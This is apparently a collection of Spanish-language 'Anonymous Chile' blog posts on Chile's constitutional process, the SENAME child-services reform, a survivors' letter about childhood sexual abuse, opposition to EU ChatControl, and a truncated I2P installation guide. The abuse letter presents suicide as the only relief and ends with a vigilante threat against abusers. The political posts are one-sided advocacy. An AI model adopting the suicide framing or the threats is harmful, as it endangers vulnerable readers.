“PROCESO CONSTITUYENTE EN CHILE Ley 21.200: Promulgada el 23 de diciembre de 2019 Publicación de la Ley N° 21.200: Autoriza plebiscito para Nueva Constitución Ley de Reforma Constitucional publicada el 24 de diciembre de 2019, y promulgada por el Presidente Sebastián Piñera del 23 de diciembre del mismo año, cuyo origen se encuentra en 7 proyectos de ley refundidos, destinados a implementar las propuestas de la Mesa Técnica que posibilitan un procedimiento encaminado a un nuevo texto de Carta Fundamental. La presente ley modifica el Capítulo XV de la Constitución Política, sobre Reforma de la Constitución, establecida en el Decreto N° 100 de 2005, del Ministerio Secretaría General de la Presidencia, con el propósito de establecer un procedimiento para elaborar una nueva Constitución Política de la República”.

Tal como lo denunciaron decenas de organizaciones civiles territoriales, académicos y especialistas en Derecho, la Ley 21.200 es una ley que no sólo puso al Plebiscito recientemente celebrado (y todos los procesos posteriores a este) DENTRO DE LA INSTITUCIONALIDAD DE LA DICTADURA DE PINOCHET, sino que principalmente busca dejar INTACTO el Modelo Económico Capitalista Neo-liberal, puesto que expresamente señala, en sus artículos 135º y 136º, que LOS TRATADOS DE LIBRE COMERCIO (TLC) FIRMADOS POR CHILE NO SE PUEDEN DEROGAR NI SER RECLAMADOS ANTE EL TRIBUNAL CONSTITUCIONAL.

Los TLC firmados por Chile (cerca de un centenar, con países y bloques de países) tienen rango constitucional en nuestro país, a diferencia, por ejemplo, del Convenio 169 de la OIT sobre Poblaciones Indígenas y Tribales, que no lo tiene. En consecuencia, la Nueva Constitución que se escribirá en este proceso inserto en la institucionalidad de la Dictadura, ya tiene, al menos, 100 Artículos previamente escritos: los TLC firmados por Chile.

En consecuencia, el “Proceso Constituyente” iniciado el pasado 25 de octubre no es sino el blindaje al Modelo Económico impuesto por la Dictadura y por extensión, el blindaje a la Constitución de Pinochet.

Los “voceros” e “intelectuales” afines principalmente a lo que fuera el bloque político opositor a Pinochet, la Concertación de Partidos por la Democracia, más el Partido Comunista y el nuevo bloque llamado Frente Amplio, se lanzaron a la tarea de convencer a las chilenas y chilenos de que la “Convención Constituyente” que se aprobó en el Plebiscito recién celebrado es similar a una “Asamblea Constituyente” y que, además, la Ley 21.200 puede ser reformada o derogada en el seno de esta “Convención”, ocultando que en esta Ley el quórum de votación que da derecho a veto es sólo de un tercio más uno de los votos de los “constituyentes”, los que serán elegidos, además, en abril de 2021 mediante elecciones basadas en el sistema actual de elecciones y partidos políticos, donde estos últimos podrán nombrar a los “independientes” que los representarán en estas elecciones.

Pero ocultan, principalmente, que el Modelo Neo-liberal es INTOCABLE porque los TLC que lo sostienen lo son, lo que demuestra el compromiso absoluto de la Clase Política con el Modelo Económico de la Dictadura y con todo aquello que lo defienda, como lo fueron las leyes represivas posteriores a este “Acuerdo por la Paz” que también se aprobaron en el Parlamento Chileno. Entre ellas, la llamada “Ley Anti-capucha” que terminó por criminalizar a toda la protesta social.

La periodista Camila Vergara, del Centro de Investigación Periodística (CIPER-Chile) escribió en diciembre de 2019 sobre esta Ley “Anti-capucha”:

…La agenda para asegurar la protección del orden neoliberal imperante está incorporando leyes de corte fascista para disuadir futuros levantamientos populares y tener las herramientas legales para legitimar su brutal represión. El último proyecto de ley enviado por el Presidente (“para fortalecer la protección de las Fuerzas de Orden y Seguridad y de Gendarmería de Chile”) —que pretende eximir de responsabilidad penal a los agentes del orden público cuando actúen en defensa propia— es particularmente revelador de esta tendencia fascista. De aprobarse, la policía podría reprimir violentamente una protesta pacífica, como lo hace regularmente, esperar a que los manifestantes se defiendan y luego disparar a matar con impunidad en defensa propia, vulnerando las libertades individuales y el debido proceso.

Además de esta Ley “Anti-capucha” se han aprobado, aún antes del Plebiscito que se comenta, otras leyes represivas, como la “Ley Anti-saqueo”, que vienen a reforzar el Estado Represivo que se pretende en Chile para evitar nuevas explosiones sociales.
“Y sin embargo, se mueve” (Galileo Galilei)

A pesar del dominio absoluto sobre los medios de comunicación de masas y de que los objetores de este proceso no tuvieron espacio alguno en la propaganda de promoción de un proceso originado en algo aún desconocido que ocurrió entre el 11 de noviembre y la madrugada del 15 de noviembre del 2019, que torció el camino hacia la Asamblea Constituyente que la misma Clase Política ya se había resignado a seguir, el éxito de este “proceso constituyente” está lejos de estar asegurado.

En efecto, las cifras oficiales del Plebiscito recién celebrado indican que LA MITAD DEL UNIVERSO ELECTORAL de casi 15 millones de personas, NO PARTICIPÓ EN EL EVENTO ORGANIZADO POR PIÑERA Y LA CLASE POLÍTICA, superando, en individuos, a la bullada cifra que dijo “APRUEBO” y que, además, contó con la mitad de la votación histórica de la Derecha Política, dado que “su” Modelo Económico no está en peligro dentro de este proceso inserto en la institucionalidad de Pinochet que, a priori, deja intactos los TLC que lo sostienen.

Las cifras oficiales entregadas por el Servicio Electoral (SERVEL) señalan que el universo electoral alcanzaba a los 14,8 millones de chilenos con derecho a voto. De ese universo, sólo se registraron 7,5 millones de votos (50,7%) de los que la opción “Apruebo” obtuvo 5,4 millones (incluidos los que le aportó la Derecha). La Abstención, en cambio, alcanzó a 7,3 millones de votos. Esto es, casi dos millones de personas más….

En síntesis, el “Apruebo” a “La Cocina” SÓLO REPRESENTA EL 36,5% DEL UNIVERSO ELECTORAL CHILENO…. La Abstención, es decir, los que se negaron a participar en este proceso oscuro, SON EL 49,3% DE ESE UNIVERSO ELECTORAL, casi de 13 puntos de diferencia.

Además del aporte de la Derecha a la votación del “Apruebo” como dato destacable, la abstención ya no correspondió mayoritariamente a los jóvenes, sino a los adultos. Mientras “la rebeldía” teóricamente acudió en masa a las urnas (y en compañía de la mitad de la Derecha) la experiencia y la sabiduría se quedaron en casa…

Así las cosas, el proceso iniciado de manera turbia el 15 de noviembre de 2019, se ha continuado en un plebiscito (o “Cocina”) donde la mitad del universo electoral no participó y que dada su composición etárea, profesional y experiencia de resistencia a la Dictadura Militar de Pinochet, puede perfectamente impedir el progreso de este mecanismo de salvataje del Modelo Económico Capitalista Neo-liberal, que no sólo ha hecho ricos a los empresarios chilenos y a las empresas transnacionales, sino también a su Clase Política.

Un cambio real a una institucionalidad dictatorial, que se pretende mantener bajo un camuflaje de “nuevo proceso”, sigue siendo posible en definitiva, en el país más Capitalista Neo-liberal del mundo. Sólo falta organizar ese cambio.

El negacionismo fascista

Publicada el 12/08/2021 por Anonymous Chile

No es algo novedoso que la derecha fascista, sus grupos armados y organizados, varios de ellos compuestos por agentes activos y en retiro del Estado, pertenecientes a alguna rama de las fuerzas armadas. Se muestran orgullosos de sus acciones de destrucción contra Sitios de Memoria a lo largo del país o Memoriales de Organizaciones de Derechos Humanos o Memoriales Populares, que recuerdan las figuras de combatientes populares asesinados por agentes del Estado durante la Dictadura Cívico Militar.

Sin embargo a pesar de no ser novedoso, hoy se han intensificado, en este casi 2 años de rebelión y resistencia. Estos grupos han querido marcar presencia, mediante la destrucción de objetos simbólicos, no entendiendo, que no dejan ser solo objetos, solo símbolos.

Es por ello que se hace imprescindibles las acciones de vindicación de estos Memoriales Populares.

Hace un tiempo atrás nos enteramos con tristeza la destrucción del mural de homenaje de los luchadores sociales y revolucionarios Julio Oliva y Roberto González.

Contra el fascismo ni un paso atrás.

Protección de la infancia para justificar un monopolio redondo con los niños de Chile

Publicada el 12/08/2021 - 12/08/2021 por Anonymous Chile

No se acaba el SENAME, sólo se modifica. Sigue siendo la empresa privada la que se hace cargo de la ejecución de la política pública, y existiendo gran posibilidad de continuar el negocio con niños, niñas y jóvenes.

Hace más ya algún tiempo atrás el Parlamento despachó un proyecto de ley que crea el Servicio Nacional de Protección Especializada a la Niñez y Adolescencia (SENAPENA) que reemplazaría al vigente Servicio Nacional de Menores (SENAME). Definitivamente el SENAME desaparece, entre comillas, y no sólo porque se constituya el SENAPENA, sino que además, se construye otro servicio, el Servicio Nacional de Reinserción Social Juvenil (SNRSJ). Por lo tanto, el Sename se divide en dos servicios distintos de aquí en adelante SNRSJ que se haría cargo de todos/as los/as niños/as entre 14 y 18 años infractores de ley y el SENAPENA que seguirá a cargo de aquellos niños, niñas y adolescentes a quienes se les transgreden sus derechos.

SENAPENA seguirá funcionando casi de modo idéntico a lo que hoy es SENAME, respecto a protección de derechos de la niñez; con la misma subvención, el mismo estilo de financiamiento de los proyectos y de licitación respecto a proyectos por parte de la empresa privada. El otro servicio que se crea, el SNRSJ, sería financiado a través de ley de Chile compra (Ley 19.886), por lo tanto, los jóvenes infractores de ley que estén bajo el alero de algunos de los programas que se liciten de esta manera, ya no estarían financiados por la vieja ley de subvenciones, lo que involucra un cambio radical, ya que no se financia de acuerdo a la asistencia de niño/día, que es una de las características de la ley de subvenciones, que, entre otras cosas, es lo que provoca que este negocio se transforme en algo tremendamente lucrativo, producto del modo salvaje en que se financia, muy parecido a como se financia la educación y que ha sido objeto de la lucha estudiantil, de hace mucho rato en este país, donde los niños y niñas se transforman en un bono que se cobra a fin de mes: tantas atenciones tuvieron, tanto valen, eso va a seguir presente en este nuevo servicio el SENAPENA.

El financiamiento a través de Chile Compra, que operará en el SNRSJ, en rigor mantiene el perverso concepto de ejecutar la política pública por la empresa privada, en tal sentido tiene las mismas características que la licitación a través de la Ley de subvenciones para la infancia y adolescencia (Ley 20.032). En el caso de la Ley de Chile compra, lo que se financia son paquetes de proyectos por determinados periodos y donde a las Instituciones se les va dando mesadas, el dinero aprobado. Por lo tanto, sigue siendo la empresa privada la que se hace cargo de la ejecución de la política pública, sigue habiendo gran posibilidad de hacer negocio con los jóvenes que por algún motivo han infringido la ley penal adolescente.

Los niños y niñas que han muerto en SENAME, no han sido sólo aquellos que han permanecido en Centros de Atención administrados directamente por el SENAME, sino que parte importante de los y las niñas y niños fallecidas/os han estado en residencias administradas por empresas privadas. De hecho, el SENAME ha traspasado más del 90% de sus funciones a estos organismos.

Es decir, no ha existido labor fiscalizadora, respecto aquellas Instituciones a las que les entrega recursos y jamás se ha preocupado de saber que se hace con el dinero. Aquí hay una responsabilidad en política de Estado, por tanto, es el Estado en última instancia, el responsable. El gran problema aquí es que, desde la creación del SENAME en 1979, por un decreto de PINOCHET, lo que se creó es un nicho para que todas estas empresas privadas empezaran, desde esa fecha, han realizado grandes negocios con el dinero del Estado, que ha servido para generar utilidades, beneficios a los administradores de estas empresas privadas denominadas OCAS (Organismos colaboradores de SENAME).

Carta de unos niños sobre su experiencia de vida luego de ser abusados sexualmente

Publicada el 11/08/2021 por Anonymous Chile

Hemos recibido una solicitud anónima de difundir y compartir una carta escrita por un grupo de personas que durante su infancia sufrieron de abuso infantil y desde entonces han vivido silenciadxs y reprimidxs bajo constantes amenazas de muerte. Intentando exponer esta situación, algunos fueron separados de sus familias y otros se suicidaron por no poder aguantar o tolerar el dolor y la rabia que durante tantos años guardaron dentro. Actualmente el agresor murió sin jamás cumplir condena, sin pagar ninguna clase de indemnización o recompensa por tan despreciable acto ni mucho menos pedir disculpas a los afectados. Frente a lo expuesto, el día de hoy Anonymous Chile obedece compartiendo y difundiendo dicha carta con el puro objetivo de hacerla llegar a más personas para que así esta situación jamás vuelva a repetirse y ningún niño tenga que someterse ni subyugarse como víctima de abuso sexual, verbal, psicológico ni físico y que los menores sean respetados y valorados por igual.

Hace 30 años la vida nos cambió para siempre: cuatro niños fuimos abusados y separados, en ese momento no supe el porqué, pensé que solo era un castigo, después de 30 años y en una vídeo llamada comprendimos que juntos éramos peligrosos para la familia y el prestigio que intentaban conservar dentro de sectas no religiosas. Personalmente me alejaba y trataba de olvidar a la familia, los primos con quiénes compartia este secreto celosamente guardado, siempre me encontraban. Compartiendo memorias de aquella época tan dolorosa para nosotros, descubrimos que cada uno tuvo un «castigo»: la que dijo la verdad en una cena familiar en un Club Español del sur de Chile y apuntó con el dedo a su violador fue enviada lejos a otro continente por 3 años; a otro se le forzó a callar si no quería correr la misma suerte de su prima enviada a un internado extranjero; la última fue sometida al rigor familiar y a constantes amenazas. Cada uno de nosotros intentó quitarse la vida, nos sentíamos avergonzados por el recuerdo atroz de esos años, por el silencio forzado. Pese a todo, lo más doloroso no es el recuerdo de nuestro abuso, sino la huella de nuestra absoluta desprotección y la ausencia total de empatía de los adultos que debían protegernos. Todos sobrevivimos a esta experiencia hasta que hace unos días uno de nosotros tomó la desicion de partir, no pudo más con los recuerdos… Entonces surgen las preguntas, Cómo se repara un daño físico de ese nivel? Cómo se sanan los sentimientos de Culpa Por no Haberse Defendido?.

Cómo Se Recupera La Salud Mental Después de sufrir abuso? Por que Ni La Justicia Puede Reparar Un daño Como Ese, Ni Con Agresor Preso Se Recupera la inocencia Robada? Porque eso es lo que pasa, Te Roban La Infancia, El Sentimiento de Pertenencia y De Protección.

En su carta de despedida mi prima escribió que no podía más, que no estaba a gusto con su vida, que jamás pudo ser plena, el sentimiento de indefensión con el que creció fue tremendo, obligada a sentarse cada domingo de su vida con su agresor. Duele su decisión, pero la comprendo pues no hay justicia posible para actos así, solo queda la muerte para poder descansar de los recuerdos.

NOS VIOLARON, violaron reiteradamente a niños de entre 7 y 11 años.
NO QUEREMOS REPARACIÓN PARA NOSOTROS PORQUE YA NO LA HABRÁ, PERO PEDIMOS COMO los niños que fuimos y que se hicieron adultos con la marca de ese dolor, que se continúe trabajando para que los niños de hoy y mañana no pasen por una experiencia como la nuestra.

Nosotros somos Anonymous
Somos legión
No perdonamos
No olvidamos
Pedófilos, abusadores y violadores de Chile y el mundo, no nos esperen porque ya estamos aquí y no intenten correr porque donde sea que se escondan los vamos a encontrar.

ChatControl: Indigna, inhumana y miserable humillación a la intimidad de la vida privada para toda la Unión Europea

Publicada el 11/08/2021 - 11/08/2021 por Anonymous Chile

El Parlamento Europeo aprobó el pasado 6 de julio del presente año 2021 un reglamento temporal, conocido como Chatcontrol, que permitirá a las compañías tecnológicas escanear comunicaciones electrónicas privadas, con el objetivo de detectar y rastrear células terroristas, cibercriminales y explotación de menores o pornografía infantil.

Planteamiento del problema

La Unión Europea pretende con esta iniciativa obligar a las plataformas electrónicas, desde Gmail, Facebook, Whatsapp, Instagram, Telegram, Twitter y similares, a instalar en sus herramientas, infraestructuras y plataformas una “puerta trasera” que permita monitorizar y vigilar en todo momento a tiempo real a los usuarios provenientes de países miembros de la Unión Europea. En concreto esta iniciativa surge como forma de luchar contra la pornografía infantil, el ciberdelito y ayudar a detener múltiples actividades criminales o delictivas en Internet, aunque resulta evidente que presenta muchas ramificaciones que eventualmente podrían ser implementadas y utilizadas para casos que no cumplen con los supuestos objetivos para los cuales fue diseñado. De esta forma, la normativa deroga la Directiva 2002/58/CE, conocida como ePrivacy, que regula aspectos como la confidencialidad de la información, el tratamiento de los datos personales y las cookies de terceros.

Análisis del problema

Chatcontrol permitirá a los proveedores de servicios de comunicación electrónica efectuar búsquedas en los mensajes que sean susceptibles de presentar contenidos sospechosos, reportándolo a las autoridades policiales, algo que algunos partidos del Parlamento Europeo, como el Partido Pirata o la agrupación de Los Verdes condenan enérgicamente por considerarlo vigilancia masiva automatizada. La principal consecuencia de esta regulación sería que plataformas de mensajería instantánea como WhatsApp o Telegram (además de herramientas como Mensajes de Apple y similares) deberían instalar de manera obligatoria una “puerta trasera” que les permitiera acceder a los mensajes de sus usuarios, que actualmente presentan cifrado de extremo a extremo.

Si bien los proveedores inicialmente tendrán la opción de registrar o no las comunicaciones, la legislación de seguimiento, que se espera para el otoño, obligará a todos los proveedores de servicios de comunicaciones a realizar una selección indiscriminada. La Comisión Europea ya ha anunciado un reglamento de seguimiento para que el Chat Control sea obligatorio para todos los proveedores de correo electrónico y mensajería. Los servicios de mensajería cifrados de extremo a extremo que antes eran «seguros», como Whatsapp o Signal, se verían obligados a instalar una puerta trasera.

¿Cómo se pretende conseguir esto?

Mediante tecnologías específicas de escaneo de contenidos. Justo lo que prohibía la directiva ePrivacy y que un acuerdo preveía revertir mediante la derogación temporal de los artículos 5.1 y 6.1 de esta directiva que protege la confidencialidad de las comunicaciones, información privada y tráfico de datos que no demuestren u ofrezcan una evidente relación con actos delictivos o cibercriminales.

Para imágenes y vídeos, servicios como WhatsApp o Signal, por citar dos proveedores de este tipo de servicios, podrían crear valores hash para el contenido audiovisual que se envía para que luego pudiese ser comparado con una base de datos en la que se encontraría contenido ilegal. Si hubiese coincidencias el contenido no se enviaría y las autoridades serían notificadas. En el caso del texto, entrarían en juego clasificadores e inteligencia artificial que analizarían los datos para detectar ciberacoso, ciberdelito y otras actividades, explica el comunicado del Parlamento Europeo tras la aprobación del reglamento temporal. Si un algoritmo considera que un mensaje es sospechoso, su contenido y metadatos se divulgan automáticamente y sin verificación humana a una organización privada con sede en EE.UU. Y de allí a las autoridades policiales nacionales de todo el mundo. No se notifica a los usuarios reportados.

Detalles a tener en cuenta

Algunos proveedores de servicios de EE. UU., Como Gmail y Outlook, ya están realizando dichos controles de mensajería y chat automatizados. Mediante una segunda ley, la Comisión de la UE tiene la intención de obligar a todos los proveedores de servicios de chat, mensajería y correo electrónico a implementar esta tecnología de vigilancia masiva, aunque algunos servicios de correo electrónico tipo Gmail y plataformas de mensajería instantánea similares a Facebook, WhatsApp, Instagram, Telegram o TikTok ya lo hacen de forma voluntaria. Estas detectan contenidos como imágenes, texto y metadatos de la comunicación para buscar patrones que mediante el uso de inteligencia artificial permitan detectar ciberdelito, cibercrimen, ciberacoso o abuso sexual que implique menores utilizando su servicio. Las compañías se dirigen con esta información a las autoridades nacionales para que prosigan la investigación y soliciten en su caso cobertura judicial para acceder al contenido de la comunicación.

La Carta de los Derechos Fundamentales de la Unión Europea protege la confidencialidad de las comunicaciones como un derecho fundamental, por lo que esta actividad, a pesar de que tiene un objetivo legítimo, «representan una injerencia en los derechos fundamentales al respeto de la vida privada y familiar y a la protección de los datos personales de todos los usuarios de servicios de comunicaciones interpersonales independientes de la numeración», reconoce la UE. Para que las compañías tengan cobertura legal, la UE ha aprobado un reglamento que establece una excepción temporal de la protección de la confidencialidad de las comunicaciones exclusivamente para casos de terrorismo, ciberdelito, ciberacoso y abuso sexual de menores, mientras se desarrolla una legislación específica a largo plazo, lo que ha disparado las alertas de organizaciones de defensa de derechos civiles, ya que podría utilizarse la ocasión para extender la vigilancia a otros contenidos.

¿Cómo nos afecta a todos?

  • Todas sus conversaciones de chat y correos electrónicos se buscarán automáticamente en busca de contenido sospechoso. Nada permanece confidencial o secreto. No se requiere una orden judicial o una sospecha inicial para buscar sus mensajes. Ocurre siempre y automáticamente.
  • Si un algoritmo clasifica el contenido de un mensaje como sospechoso, el personal y los contratistas de las corporaciones internacionales y las autoridades policiales pueden ver sus fotos privadas o íntimas. Además, sus fotos privadas de desnudos pueden ser vistas por personas que no conoce, en cuyas manos sus fotos no están seguras.
  • El personal y los contratistas de las corporaciones internacionales y las autoridades policiales pueden leer coqueteos y mensajes de texto sexuales, ya que los filtros de reconocimiento de texto que buscan «acicalamiento infantil» frecuentemente señalan falsamente las conversaciones íntimas.
  • Puede ser denunciado e investigado falsamente por supuestamente difundir material sobre explotación sexual infantil. Se sabe que los algoritmos de mensajería y control de chat marcan fotos de vacaciones completamente legales de niños en una playa, por ejemplo.
  • Según las autoridades de la policía federal suiza, el 86% de todos los informes generados por máquinas resultan sin fundamento. El 40% de todos los procedimientos de investigación penal iniciados en Alemania por «pornografía infantil» se dirigen a menores.
  • En su próximo viaje al extranjero, puede esperar grandes problemas. Es posible que los informes generados por máquinas sobre sus comunicaciones se hayan transmitido a otros países, como EE.UU., Donde no hay privacidad de datos, con resultados incalculables.
  • Los servicios de inteligencia y los piratas informáticos pueden espiar sus chats y correos electrónicos privados. La puerta estará abierta para que cualquier persona con los medios técnicos pueda leer sus mensajes si se elimina el cifrado seguro para poder filtrar los mensajes.
  • Este es sólo el comienzo. Una vez que se ha establecido la tecnología para la mensajería y el control del chat, resulta muy fácil utilizarlos para otros fines. ¿Y quién garantiza que estas máquinas de incriminación no se utilizarán en el futuro en nuestros teléfonos inteligentes y portátiles?

Información y argumentos adicionales

  • Todos los ciudadanos son puestos bajo sospecha, sin motivo, de posiblemente haber cometido un delito. Los filtros de texto y fotos monitorean todos los mensajes, sin excepción. No se requiere que ningún juez ordene tal monitoreo – a diferencia al mundo analógico que garantiza la privacidad de la correspondencia y la confidencialidad de las comunicaciones escritas. Según sentencia del Tribunal de Justicia de las Comunidades Europeas, el análisis automático permanente y generalizado de las comunicaciones privadas vulnera derechos fundamentales (caso C-511/18, párr. 192). Sin embargo, la UE ahora tiene la intención de adoptar dicha legislación. Para que la corte lo anule puede llevar años. Por lo tanto, debemos evitar la adopción de la legislación en primer lugar.
  • Se sacrifica la confidencialidad de la correspondencia electrónica privada. Los usuarios de los servicios de mensajería, chat y correo electrónico corren el riesgo de que se lean y analicen sus mensajes privados. Las fotos y el contenido de texto sensibles podrían enviarse a entidades desconocidas en todo el mundo y caer en las manos equivocadas. Según los informes, el personal de la NSA ha hecho circular fotos desnudas de ciudadanos y ciudadanas en el pasado. Se ha informado que un ingeniero de Google acecha a menores.
  • La mensajería indiscriminada y el control del chat incrimina indebidamente a cientos de usuarios todos los días. Según la Policía Federal Suiza, el 90% del contenido informado por máquinas no es ilegal, por ejemplo, fotos inofensivas de vacaciones que muestran a niños desnudos jugando en la playa.
  • La comunicación cifrada de forma segura está en riesgo. Hasta ahora, los algoritmos no pueden buscar mensajes cifrados. Para cambiar eso, las puertas traseras deberían estar integradas en el software de mensajería. Tan pronto como eso suceda, esta laguna de seguridad puede ser explotada por cualquier persona con los medios técnicos necesarios, por ejemplo, por los servicios de inteligencia extranjeros y los delincuentes. Se expondrían las comunicaciones privadas, los secretos comerciales y la información gubernamental confidencial. Se necesita un cifrado seguro para proteger a las minorías, las personas LGBTQI, los activistas democráticos, los periodistas, etc.
  • Se está privatizando la justicia penal. En el futuro, los algoritmos de corporaciones como Facebook, Google y Microsoft decidirán qué usuario es sospechoso y cuál no. La legislación propuesta no contiene requisitos de transparencia para los algoritmos utilizados. En virtud del estado de derecho, la investigación de los delitos penales está en manos de jueces independientes y funcionarios públicos bajo la supervisión de los tribunales.
  • La mensajería indiscriminada y el control del chat crean un precedente y abren las compuertas. Implementar tecnología para monitorear automáticamente todas las comunicaciones en línea es peligroso: se puede usar muy fácilmente para otros propósitos en el futuro, por ejemplo, violaciones de derechos de autor, abuso de drogas o «contenido dañino». En estados autoritarios, esta tecnología sirve para identificar y arrestar a opositores al gobierno y activistas por la democracia. Una vez que la tecnología se implementa de manera integral, no hay vuelta atrás.
  • La legislación temporal sobre la mesa es ineficaz. Contrariamente a su intención, no permitirá que Facebook et al continúen con el monitoreo masivo de la correspondencia privada. Limita la directiva ePrivacy. Sin embargo, el control del chat continuará violando el Reglamento General de Protección de Datos (DSGVO) porque carece de base legal y viola el principio de proporcionalidad. La Agencia Irlandesa de Protección de Datos está examinando una denuncia presentada por Patrick Breyer.

Conclusiones del problema

En consecuencia, una vez más podemos apreciar cómo nuestra vida privada, información confidencial y datos personales son violados y vulnerados por las autoridades sin siquiera comunicarnos nada. Es inaceptable que nuestros mensajes personales se monitoricen para comprobar si contienen o no material relacionado con el abuso y la explotación sexual de menores en línea. Lo que se ha aprobado no es una normativa contra el abuso sexual online sino una ley sobre vigilancia masiva. Es una triste noticia para los que defendemos las comunicaciones libres y cifradas, e incluso para aquellos que dependen de comunicaciones confidenciales. Como afirma el diputado del Partido Pirata Alemán, Patrick Brever, «el reglamento asesta un golpe mortal a la confidencialidad de la correspondencia digital; es una brecha generalizada que permite la vigilancia indiscriminada de espacios privados por parte de corporaciones»

Conectando con la red anónima de I2P

Publicada el 10/08/2021 - 22/10/2021 por Anonymous Chile

El Proyecto de Internet Invisible (I2P) nace en el año 2003 como una implementación de P2P anónimo con E2EE por capas que tuneliza las conexiones bajo la Internet Obscura (del inglés dark web o dark net) a fin de proveer una red totalmente anónima, descentralizada, autogestionada y basada en mensajes ofreciendo el máximo nivel de seguridad posible mediante el cifrado de cada paquete de datos de cada identidad por criptografía asimétrica entre los nodos participantes de cada túnel.

De esta manera, I2P trabaja montando un nodo local en la máquina donde se ejecuta que funciona como enrutador mediante el cual administra todas las conexiones, registra los sitios web en una libreta de direcciones, conecta con pares, configura los túneles, eepsites, enlaza a los principales sitios de la red, provee múltiples servicios entre correo electrónico con I2P Bote y Susimail, intercambio de archivos anónimos mediante Muwire, almacenamiento en la nube descentralizado con Tahoe-LAFS, mensajería instantánea con F2F mediante Retroshare, IRC y XMPP, conexiones seguras con VPN, descarga de archivos mediante Torrent con I2PSnark, iMule, I2Phex, entrega interactivos manuales y tutoriales de uso, convivencia y solución de problemas.

Entre sus principales caracterísiticas, se pueden destacar:

  • I2P es una mixnet de rutas libres: El creador del mensaje define explícitamente el camino que seguirán los mensajes enviados (el túnel de salida), y el receptor del mensaje define explícitamente el camino por el cual serán recibidos los mensajes (el túnel de entrada).
  • I2P no tiene puntos de entrada y salida oficiales: Todos los pares participan completamente en la mezcla, y no hay proxies de entrada o salida en la capa de red (aún así existen varios proxies de salida en la capa de aplicación)
  • I2P es totalmente distribuido: No existen centros de control o autoridades. Cualquiera pude modificar algunos ruters para operar cascadas de mezcla (construyendo túneles y dando las claves necesarias para controlar el envío al final del túnel) o controlar los perfiles de los directorios, todo esto sin romper la compatibilidad con el resto de la red, pero por supuesto no es necesario hacer nada de esto (y además podría poner en peligro su anonimato).

Aunque otras redes como TOR o Freenet hayan surgido casi al mismo tiempo y cada una de ellas tenga un caso de uso distinto, al final todas persiguen el mismo fin: proteger el anonimato y la privacidad de los usuarios finales. Pero con el paso de los años Tor se ha convertido en la red anónima por excelencia, dejando en un segundo plano a otras redes que cuentan con un gran potencial como I2P (sobre todo por su modelo de comunicación, enrutamiento y cifrado de paquetes).

A diferencia de otras redes anónimas, I2P no trata de preservar el anonimato ocultando el origen y el destino de una comunicación, ya que el hecho de encontrarse en esta red no es ningún secreto. I2P está diseñado para que toda la actividad que se lleve a cabo en la red permanezca oculta y los pares puedan comunicarse entre sí de forma anónima, no solo entre ellos sino también para aquellos terceros que puedan estar escuchando.

Básicamente, el propósito de I2P es permitir a los usuarios comunicarse de forma anónima en entornos hostiles donde todos los mensajes generados, tanto por aquellos usuarios que necesitan un alto nivel de anonimato como los que no, acaban mezclándose en la misma red generando el suficiente tráfico que impida distinguir unos mensajes de otros.

Inclusive, como una capa extra de seguridad y comodidad, también es posible instalarlo y configurarlo en un servidor o equipo externo en Internet o dispositivo conectado dentro de la red inalámbrica de el/la/lxs usuarix(s) para independizar, separar y aislar los procesos en 2 máquinas distintas permitiéndole conectarse remotamente al nodo configurado y montado en dicha máquina, equipo o servidor y utilizarlo como enrutador a I2P. Esto es muy importante ya que aumenta la eficiencia de las comunicaciones, mejora la seguridad, comodidad y eficiencia de uso implementando medidas más avanzadas y personalizadas al gusto de el/la/lxs usuarix(s), como el uso de VPN, VPS, SSH, TOR, proxys y sistemas de virtualización entre la computadora de el/la/lxs usuarix(s) y el servidor, equipo, dispositivo o máquina que enruta a I2P.

Sin embargo, es posible que los usuarios menos experimentados necesiten instalar Java versión 7, 8 o posterior (Se recomienda la versión 7 u 8 de Oracle, OpenJDK o IcedTea) como requisito previo para administrar y configurar cómodamente su enrutador I2P mediante una interfáz gráfica montada en el servidor local y operada desde el navegador web, ya que el enrutador por defecto de I2P está programado en Java. Por el contrario, los usuarios más avanzados pueden encontrar alternativas confiables, tanto en terminal de comandos como interfáz gráfica, que les permitan conectarse, administrar y configurar su enrutador I2P sin depender de Java.

Mientras tanto, para los usuarios menos experimentados, habiendo instalado Java, deben dirigirse a la página de Descargas de I2P y, según el sistema operativo que se encuentre corriendo en la máquina, dispositivo, servidor o equipo donde desea instalarse, se descarga un binario de instalación precompilado, en caso de GNU/Linux podría encontrarse para instalación en los respectivos repositorios de la distribución que utilice o se encuentre ejecutando, como también compilarlo directamente desde su GIT, entre múltiples otras opciones.

Instalación de I2P

Microsoft Windows

En el caso de Microsoft Windows, podrá descargar el correspondiente binario precompilado para el susodicho sistema operativo desde la citada página de descargas.

Posteriormente, proceda con su respectiva instalación siguiendo los pasos establecidos por el mismo software.


I2P se encuentra traducido a una gran multitud de diferentes y distintos idiomas que puede seleccionar y elegir a gusto personal según mejor le acomode.


I2P se encuentra licenciado bajo GPL, MIT y BSD, entre muchas otras licencias permisivas, flexibles y abiertas con el software libre y la filosofía del código abierto.


Seleccione la ruta en donde desea instalar I2P. Si no tiene alguna preferencia en particular o no sabe qué elegir, puede dejar la opción por defecto tal como figura en la imagen.


Seleccione qué modalidades o extensiones de I2P gustaría instalar. Por defecto, se instala la base del protocolo.


Espere a que finalice el proceso de instalación y finalmente haga click en Next.


Ahora I2P se encuentra instalado en su computadora.

Para terminar, podrá visualizar un ícono de acceso directo en su escritorio y/o menú de aplicaciones. Puede presionarlo y el enrutador I2P comenzará a funcionar inmediatamente. Finalmente será capáz de administrar y configurar su enrutador I2P desde su navegador web en la dirección https://X.X.X.X:7657/home. Para más información y detalles, favor de visitar la Guía de instalación de I2P en Microsoft Windows.

Mac OSX

Para Mac OSX suele ser recomendable instalar el binario precompilado mediante el comando java en la terminal.

java -jar i2pinstall_version-X.X.X.jar

Dicho comando abrirá un instalador gráfico muy intuitivo, interactivo y amigable para la mayoría de usuarios. De todas formas, si prefiere instalar todo directamente desde la terminal, puede agregar la opción -console al comando anterior ejecutando de la siguiente manera:

java -jar i2pinstall_version-X.X.X.jar -console

El proceso a continuación suele ser muy similar al experimentado en Microsoft Windows. Posteriormente, visualizará el ícono de I2P en su menú de aplicaciones desde el cual podrá arrancarlo y conectarse cómodamente gestionando y configurando su enrutador desde su interfáz gráfica, mediante el navegador web, montada en el servidor local.

Android

